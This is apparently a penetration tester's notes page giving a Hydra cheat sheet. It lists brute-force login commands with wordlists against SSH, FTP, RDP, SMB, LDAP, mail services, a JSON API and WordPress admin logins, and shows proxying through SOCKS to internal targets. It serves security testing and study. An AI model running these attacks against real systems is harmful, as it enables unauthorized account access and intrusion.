Hydra

HYDRA ONLINE PASSWORD CRACKER

Supports A LOT of protocols

Complementary source: https://github.com/frizb/Hydra-Cheatsheet/tree/master

Commands:

Test a login with same user as password, null password and reverse username as password

hydra –l USER –e nsr IP ftp

protocol = ftp, ssh, http-post-form (Requires login error to work), http-get, etc.

Example:

hydra -l USER -P LIST TARGET_IP http-get /directory/

JSON brute force with Hydra

Example:

hydra -l USER -P rockyou.txt TARGET_IP -s TARGET_PORT http-post-form "/api/session/authenticate{\"username\"\:\"^USER^\",\"password\"\:\"^PASS^\"}:Authentication failed:H=Content-Type\: application/json" -t 64

Run Hydra using a proxy against an internal target with the commands:

export HYDRA_PROXY=socks5://localhost:1080

hydra -L users.txt -P passwords.txt TARGET_IP ssh -V

Alternate Trick: Combine your username and password list into a single "userpass" file

1) Write the usernames and passwords in a single file divided by the symbol ':'

2) Then run

hydra -C combined.txt TARGET_IP ssh -V

Hydra-Cheatsheet

Hydra Password Cracking Cheetsheet

The following table uses the $ip variable which can be set with the following command:

export ip 10.10.10.1

Command

Description

hydra -P password-file.txt -v $ip snmp

Hydra brute force against SNMP

hydra -t 1 -l admin -P /usr/share/wordlists/rockyou.txt -vV $ip ftp

Hydra FTP known user and rockyou password list

hydra -v -V -u -L users.txt -P passwords.txt -t 1 -u $ip ssh

Hydra SSH using list of users and passwords

hydra -v -V -u -L users.txt -p "" -t 1 -u $ip ssh

Hydra SSH using a known password and a username list

hydra $ip -s 22 ssh -l -P big_wordlist.txt

Hydra SSH Against Known username on port 22

hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f $ip pop3 -V

Hydra POP3 Brute Force

hydra -P /usr/share/wordlistsnmap.lst $ip smtp -V

Hydra SMTP Brute Force

hydra -L ./webapp.txt -P ./webapp.txt $ip http-get /admin

Hydra attack http get 401 login with a dictionary

hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip

Hydra attack Windows Remote Desktop with rockyou

hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt $ip smb

Hydra brute force SMB user with rockyou:

hydra -l admin -P ./passwordlist.txt $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'

Hydra brute force a Wordpress admin login

hydra -L usernames.txt -P passwords.txt $ip smb -V -f

SMB Brute Forcing

hydra -L users.txt -P passwords.txt $ip ldap2 -V -f

LDAP Brute Forcing

PreviousHashcat NextJSONBrute

Last updated 4 months ago

hashtagHYDRA ONLINE PASSWORD CRACKER

hashtagSupports A LOT of protocols

hashtagComplementary source: https://github.com/frizb/Hydra-Cheatsheet/tree/master

hashtagCommands:

hashtagExample:

hashtagJSON brute force with Hydra

hashtagExample:

hashtagRun Hydra using a proxy against an internal target with the commands:

hashtagAlternate Trick: Combine your username and password list into a single "userpass" file

hashtag1) Write the usernames and passwords in a single file divided by the symbol ':'

hashtag2) Then run

hashtagHydra-Cheatsheet

HYDRA ONLINE PASSWORD CRACKER

Supports A LOT of protocols

Complementary source: https://github.com/frizb/Hydra-Cheatsheet/tree/master

Commands:

Example:

JSON brute force with Hydra

Example:

Run Hydra using a proxy against an internal target with the commands:

Alternate Trick: Combine your username and password list into a single "userpass" file

1) Write the usernames and passwords in a single file divided by the symbol ':'

2) Then run

Hydra-Cheatsheet